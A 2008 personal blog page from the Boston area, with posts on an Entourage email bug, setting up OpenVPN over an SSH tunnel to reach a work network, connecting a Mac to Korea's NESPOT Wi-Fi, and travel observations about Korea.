Content

random noises emanating from the boston area

Entourage 2008 can’t see emails with a plus (“+”) in the subject.

Sunday 19 October 2008 - Filed under Software

Many people that use Macs need to use Entourage because their company utilizes Microsoft Exchange. That’s fine with me, as Exchange seems to be a perfectly functional (when someone else is running it) calendaring/email/addressbook “enterprise” thing. Plus, Mail.app is such a frustratingly bad piece of software. But this (probably) bug in Entourage is really silly.

Try sending yourself an email with the plus sign, “+” in the subject. Outlook can see it. Webmail can see it, but Entourage has no friggin’ idea it is there. The receipt of the mail triggers the sync of the inbox, but nothing shows up! What the hell?

Now, to find where the heck the bug submission button is…

1 comment  ::  Share or discuss  ::  2008-10-19  ::  mark

First iPhone post

Thursday 24 July 2008 - Filed under General

Okay, really just my iPod touch. But still, I’m sure this is the 10,000th “from my iPhone” post on the Internet. So be it, it’s still kinda neat.

Holy crap. This is my 100th post. Wow.

 ::  Share or discuss  ::  2008-07-24  ::  mark

Mac OS X + OpenVPN bridge + SSH Tunnel = VPN goodness

Sunday 20 July 2008 - Filed under Internet + Software

Ah, the beauty of open source software. This is a long post that started with a simple problem. At work, we live behind the Great Olin Firewall (GOF). I checked out some code from an internal Subversion repository over HTTP. Now, I’m outside the GOF and I want to commit some important changes. We have an SSH gateway, and SSH has a built-in SOCKS5 proxy. Cool, that should work, right? Nope. While you can use tsocks or proxychains, or some other transparent proxy service to get most of the way there, it isn’t the whole thing. I learned a lot from this page, but proxychains doesn’t compile well on OS X. Ugh. And tsocks doesn’t tunnel DNS requests on OS X.

Now, the GOF is a Nortel piece that uses a custom hash function for the username running and standards-based IPSec VPN. Boo. That means it won’t work with any third-party VPN client. You have to use the Contivity piece of garbage. Bonus that this piece of garbage is written by Apani, and is now no longer actively supported. Double ugh. So here is what I need:

  • VPN access to the work network
  • Tunneled through SSH
  • Ability to redirect DNS lookups through the VPN
  • Free, as in speech

What you’ll need to do this:

  • Root on a linux server inside the firewall
  • Mac on the outside

There, not so hard? Thankfully, the Intarwebs and a little hacking last night delivered the goods. In short, I used OpenVPN, a few scripts, and a little luck. Here’s how.

Server

  1. I used Ubuntu Dapper inside a Xen virtual machine. Worked great.
  2. apt-get install openvpn openssl bridge-utils
  3. cp -R /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn
  4. Follow the directions for generating keys at the OpenVPN HOWTO
  5. Copy the keys to the right places, as from the above HOWTO. I put my keys in /etc/openvpn/keys
  6. Use the following configuration file for your server. This assumes an ethernet bridge will be built (later) and that you have a DHCP server somewhere on the LAN to give out IP addresses to VPN clients

    proto tcp-server
    dev tap0
    ca /etc/openvpn/keys/ca.crt
    cert /etc/openvpn/keys/server.crt
    key /etc/openvpn/keys/server.key
    dh /etc/openvpn/keys/dh1024.pem
    mode server
    tls-server
    client-to-client
    keepalive 10 120
    cipher BF-CBC
    comp-lzo
    persist-key
    persist-tun
    status openvpn-status.log
    verb 3
  7. Create the ethernet bridge Debian-style by adding the following lines to your /etc/network/interfaces:

    auto br0
    iface br0 inet dhcp
    pre-up openvpn --mktun --dev tap0
    bridge_ports eth0 tap0
  8. Restart network with /etc/init.d/network stop and /etc/init.d/network start
  9. Now you should still have internet connectivity, and eth0 and a br0 bridge

Client

  1. Get and install OpenVPN 2.x. I used Macports, so I just fired up ports like: sudo port install openvpn2
  2. Grab and install the tun/tap driver for Mac OS X
  3. Reboot, or force install the kernel extensions
  4. Make sure you have the client encryption keys from above, and use the following client configuration:
    client
    dev tap
    proto tcp-client
    remote localhost
    tls-client
    ca /opt/local/etc/openvpn/keys/ca.crt
    cert /opt/local/etc/openvpn/keys/mchang.crt
    key /opt/local/etc/openvpn/keys/mchang.key
    cipher BF-CBC
    comp-lzo
    nobind
    persist-key
    persist-tun
    up /opt/local/etc/openvpn/tap-up-down.sh
    down /opt/local/etc/openvpn/tap-up-down.sh
    verb 3
  5. Grab the openvpn-tap-up-down.sh script from the bottom half of this mailing list posting, or download it right here: tap-up-down.sh
  6. Install that tap-up-down.sh in /opt/local/etc/openvpn and chmod +x it so it can be executed

Fire it up

Now we’re ready to start this thing up, over an SSH tunnel, kind of like describe in this post.

  1. Fire up your ssh, tunneling the OpenVPN port like
    ssh -L 1194:vpn.your.domain.com:1194 ssh-gateway.your.company.com
  2. Where ssh-gateway.your.company.com is your ssh gateway, and vpn.your.domain.com specifies the tunnel endpoint at the VPN server you have just set up.
  3. Turn on OpenVPN on the server like
    openvpn --conf /etc/openvpn/bridge.conf
  4. Turn on OpenVPN on the client like
    sudo openvpn2 --config /opt/local/etc/openvpn/client.conf
  5. You should see, on both sides, OpenVPN authenticating and then starting up.

Now, you should be able to ping any machine on the remote subnet. I wanted to be able to get to anything on the internal network through the VPN, so I manually added a route to all of the internal network (10.0.0.0/8) through the VPN server’s default gateway. Like this:

route add 10.0.0.0/8 10.49.27.1

Of course, substitue the IP of the VPN server’s gateway to the rest of the network for 10.49.27.1. That, combined with the handy script from Ben Low, allows all DNS lookups for the internal network to go to the internal DNS servers, routed through the VPN.

Some notes:

  1. On the server side, everything is pretty much normal. I can’t seem to use the “push redirect-gateway” through this system, as a) either the OS X port of OpenVPN doesn’t support it (unlikely), or b) the gateway information is a little borked as it is going over an SSH tunnel. Either way, I just manually add the route to the default gateway.
  2. For some reason, the tap0 driver does not go into DHCP mode by default. You have to force it using the ipconfig program, which is done for you in the tap-up-down.sh script.
  3. On the client side, Mac OS X has a very complex name resolution service. Very cool if you get under the hood, as seen in these two threads on the Apple developer mailing list. The end result is that when you get the DHCP lease from the internal LAN DHCP server, the tap0 device gets some service keys that record the DNS servers pushed from the LAN DHCP server. After the tap0 driver comes up through OpenVPN, you can see this by running scutil from the command line, and executing
    get State:/Network/Service/DHCP-tap0
    d.show
  4. Now, OS X needs to have a SupplmentalMatchDomains key associated with these DNS entries before it will actually consult them as part of the name resolution service. The script does that for you. You can see its effects after the VPN starts up by running scutil --dns

There you go. Now poke holes in your own Great Corporate Firewall!

1 comment  ::  Share or discuss  ::  2008-07-20  ::  mark

Public Wi-Fi in Korea and a Macintosh

Sunday 20 July 2008 - Filed under Internet

No one in Korea uses a Macintosh. Thus, it makes perfect sense that they would not support Mac OS X in any web applications or public services, such as city-wide wireless. One such provider is Korea Telecom’s NESPOT service. This is the nearly-ubiquitous blanket of wireless that covers much of Seoul. From your Universities, to Starbucks, to Hotels, etc. It’s everywhere. And it only works on Windows. It also serves homes with wired and wireless internet access.

As it turns out, it is a very standards-based system that uses RADIUS authentication. The key to finding that out was this IEEE conference publication from World of Wireless, Mobile and Multimedia Networks, 2006. Even from the abstract one can see that NESPOT uses 802.1x authentication. In fact, if you read the article, they use this system to authentcate millions of users using very little processing power. It is probably the largest installation of 802.1x authentication in the world, or so they claim.

(Yes, you can register your MAC address with them and then you don’t need to authenticate. But then you’d have to be able to read Korean to click through the menus, and I can’t.)

Since Mac OS X 10.3 (Panther), OS X has had 802.1x support built in to the networking subsystem. All you have to do is enable MD5 authentication, enter your username and password, and blam, you are rocking. Some screenshots of 10.5 (Leopard) below:

  1. Turn on Airport
  2. Make sure you can connect to the SSID “NESPOT”. You will get an IP address, but you won’t be able to get anywhere but the NESPOT main page.
  3. Open System Preferences > Network
  4. Choose Airport, then click Advanced…
  6. Choose the 802.1x tab
  7. Click the “+” and create a new User Profile
  8. Enter your username and password
  9. Choose “NESPOT” for the Wireless Network
  10. Make sure to check the “MD5″ box in Authentication. I left TTLS and PEAP checked. I don’t know if these are necessary.
  11. Click OK
  12. Now choose the “AirPort” tab
  13. Double click on “NESPOT”
  14. Change the Security pulldown to 802.1X WEP
  15. Select the “NESPOT” user profile from the 802.1X pulldown
  16. Click Add on this dialog
  17. Click OK to close out the Advanced… dialog
  18. Then click Apply to apply your changes to the Network
  19. Now, the Airport status should say Connected, and under that, it should say something like Authenticated via MD5.
  20. If that doesn’t happen, turn off your Airport and turn it on again. You might have to go back into the Advanced… menu and edit Airport settings like from #11-#17. For some reason, my Mac forgets this security setting.

Enjoy.

 ::  Share or discuss  ::  2008-07-20  ::  mark

Random thoughts from Korea

Sunday 20 July 2008 - Filed under Travel

I’ve been here for about a month, working, living, and generally absorbing as much of Korea as I can. Here are a few random observations that I’ve noted. And yes, they generalize a lot about an entire culture. Think of it as an outsider’s snapshot of Korea.

  • Smoking seems to be more prevalent here than in the United States. It is not uncommon to see dozens of people outside of each university building smoking in between classes and during lunch.
  • People walk slowly. Even compared to Iowa. I attribute this to the large Confucian influence, where not being in a hurry is valued. I dig it, because it is hot here, and I can walk really slowly and not break out in a pouring sweat.
  • Koreans love fried chicken. Okay, this is very over-generalizing, but I mean it in the nicest way since I freaking love fried chicken. Koreans make the most wonderful, delicious, succulent friend chicken. It is not to be confused with southern fried chicken in the United States, and I wouldn’t make them compete against each other. Rather, I’d have a big bucket of each and just enjoy. For more, check out this New York Times article about importing Korean-style fried chicken to New York City. Mmmm… one thing I will really miss about this place.
  • Parking is surprisingly cheap for such a crowded city. Well, at least compared to the Boston area.
  • Korean traffic is slow. In two ways, actually. The speed limits are low, and the traffic is thick. Think of it as the central downtown area of any big city (NYC, Boston, Chicago), except spread out over a larger area. When I drive in to work from the suburbs (say, like Natick to Boston), it is about 11-12 on-road miles. It can take anywhere from 30-90 minutes. The speed limit is at most 70kph in places, but one rarely gets going that fast. The drivers are not very aggressive, and they all seem to reliably signal their intentions, but it is crowded. You really have to pay attention, as lanes appear and disappear constantly, with the only indication being arrows painted in the lanes.
  • The arrows painted on the streets are all done in the same font. Cool.
  • Koreans don’t use Google. They user Daum.net or Naver.com.
  • http://maps.naver.com must have some sort of geolocating via IP address going on because when you open it in your browser, it brings centers on your current location pretty reliably. I’ve tested this at home, at the Ramada Hotel, and at Yonsei and Ewha Universities. Very cool, and super useful.
  • Koreans must have the ability to take in more sensory input than I can. I find everything a little overwhelming. They have tons of bright lights on every building. People are constantly shouting at you at the grocery store to buy their stuff. They even use amplification on the weekends. The music and the department stores is blaring. Their web pages have so much going on on them it is crazy. (The simplistic Web 2.0-y U.S. style has just not caught on here, with the big, simple, shiny buttons and very little text.) It is all a bit much for this midwesterner. Check out any Korean web page and you’ll see what I’m talking about.
  • On that topic, I went to the aquarium yesterday. For one of their underwater shows, they had a crowd of people assembled in front of a tank, all crammed into the area twice as large as a large living room. In the U.S., the announcers/guides would have either just shouted, or had very little local amplification. Not here. The sound was seriously loud. And it didn’t seem to bother anyone but me. Ouch.
  • No one uses a Macintosh here. But, they still remain “cool” enough to use as props for high-end commercials where people are acting like architects and stuff. Go figure.

Okay, enough for now. This is probably only interesting to me, and even that is suspect.

 ::  Share or discuss  ::  2008-07-20  ::  mark

« Older entries
» Newer entries